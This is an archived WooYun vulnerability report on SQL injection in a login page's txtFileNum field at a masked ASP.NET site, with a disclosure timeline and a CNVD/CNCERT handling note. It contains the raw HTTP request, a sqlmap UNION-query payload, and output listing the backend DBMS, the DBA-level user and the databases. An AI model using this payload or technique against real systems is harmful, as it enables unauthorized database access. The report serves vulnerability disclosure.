乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
rt
**.**.**.**
POST /upfile/template/firstpage/WJENTPRSERV_current/UserLogon.aspx HTTP/1.1Content-Length: 318Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://**.**.**.**Cookie: ASP.NET_SessionId=1g0x2y45bjc1oh2l1renkoiz; _gscu_281959052=489554143bnyq812; _gscs_281959052=48955414tb8ymn12|pv:3; _gscbrs_281959052=1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*btnSubmit=%b2%e9%d1%af&txtFileNum=LgiB1M7f&txtID=1&__EVENTVALIDATION=/wEWBAKa6auCCwK3lOTUDgKs%2b5bqDwLCi9reA6tl3n5B0rP%2bhPNB54i7kqDR5NTi&__VIEWSTATE=/wEPDwUJNDIyODg5OTA2D2QWAgIDD2QWAgIFDw9kFgIeB29uY2xpY2sFHmphdmFzY3JpcHQ6cmV0dXJuIENoZWNrRm9ybSgpO2RkBIGwOFlkWpYDeMEOewPvbRlsKaQ%3d
txtFileNum 参数存在sql注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: txtFileNum (POST) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: btnSubmit=%b2%e9%d1%af&txtFileNum=LgiB1M7f' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(77)+CHAR(119)+CHAR(110)+CHAR(67)+CHAR(122)+CHAR(108)+CHAR(74)+CHAR(99)+CHAR(121)+CHAR(112)+CHAR(73)+CHAR(80)+CHAR(68)+CHAR(121)+CHAR(118)+CHAR(112)+CHAR(70)+CHAR(67)+CHAR(111)+CHAR(111)+CHAR(98)+CHAR(103)+CHAR(120)+CHAR(111)+CHAR(109)+CHAR(83)+CHAR(83)+CHAR(118)+CHAR(117)+CHAR(120)+CHAR(73)+CHAR(121)+CHAR(111)+CHAR(86)+CHAR(111)+CHAR(115)+CHAR(75)+CHAR(105)+CHAR(100)+CHAR(99)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&txtID=1&__EVENTVALIDATION=/wEWBALw8tDHAQK3lOTUDgKs+5bqDwLCi9reA8wxHrId2un7vqgRawtuf1vmRZDJ&__VIEWSTATE=/wEPDwUJNDIyODg5OTA2D2QWAgIDD2QWBAIFDw9kFgIeB29uY2xpY2sFHmphdmFzY3JpcHQ6cmV0dXJuIENoZWNrRm9ybSgpO2QCBg8WAh4EVGV4dAVxPHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnPmFsZXJ0KCflr7nkuI3otbfvvIzkvaDmiYDovpPlhaXnmoTor4Hkuablj7fmiJbouqvku73or4Hlj7fkuI3mraPnoa7vvIEnKTs8L3NjcmlwdD5kZOfHvewHjAiRHrCk9SaK6OUd6sNH---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current user: 'ksrsks'current database: 'InfoPubMain_KSRCService'current user is DBA: Trueavailable databases [7]:[*] InfoPubAttach_KSRCService[*] InfoPubMain_KSRCService[*] master[*] model[*] msdb[*] rlzyexam[*] tempdb
危害等级:高
漏洞Rank:10
确认时间:2015-12-14 16:22
CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.
暂无